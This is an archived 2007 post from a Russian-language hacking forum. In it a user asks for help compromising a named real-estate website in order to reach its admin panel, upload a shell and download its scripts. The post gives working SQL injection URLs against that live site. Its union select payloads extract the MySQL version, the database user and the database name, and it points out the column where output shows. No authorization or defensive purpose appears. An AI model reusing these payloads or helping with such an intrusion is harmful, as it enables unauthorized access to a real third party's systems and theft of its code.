ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.10.2007, 11:17
FFFFx029A
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035

Репутация: 14
Отправить сообщение для FFFFx029A с помощью ICQ
По умолчанию

Народ, хелп, помогите заюзать сайтец, очень нужно узнать или доступ к админке или шелл залить..., основная цель - эт выкачать скрипты.
(Сайт дырявый как сито)
P.S ща вот сам колупаю, еси у кого получиться скидуйте сюда...

http://www.megaholl.com.ua/find_flat.php?a=1&d%5B%5D=16&d%5B%5D=21&d%5B%5D=22 &d%5B%5D=23&d%5B%5D=26&d%5B%5D=39))+union+select+u ser(),user(),3,4,5,6,user(),user(),user(),user(),u ser(),user(),13,14,15,16,17,18,19,20,21,22,23/*&sm=s1a&sr=n

или вот:
http://www.megaholl.com.ua/find_stead.php?a=2'
----------------------------------------------------------------------------

Вот версия мускула: http://www.megaholl.com.ua/4.1.22-standard/2.html
Вот так узнал версию:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+version(),2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t

Вот пользователь: http://www.megaholl.com.ua/u_megaholl@localhost/2.html
Во так узнал пользователя:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+user(),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t

Вот БД:
http://www.megaholl.com.ua/megaholl/2.html
Вот так узнал имя ДБ:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*&sm=s1d&sr=t

Названия таблиц - немогу узнать, т.к пишет ошибка, но явная ошибка невысвечуеться (скрыто тут такое)



Вот для наглядности чтобы вы неискали где выводяться данные, я кстате случайно заметил, думал что там фильтруеться, ггг
Вот: http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),'wwwww wwwwwwwwwwwwwwww',3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23/*&sm=s1d&sr=t

Последний раз редактировалось FFFFx029A; 10.10.2007 в 11:43..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ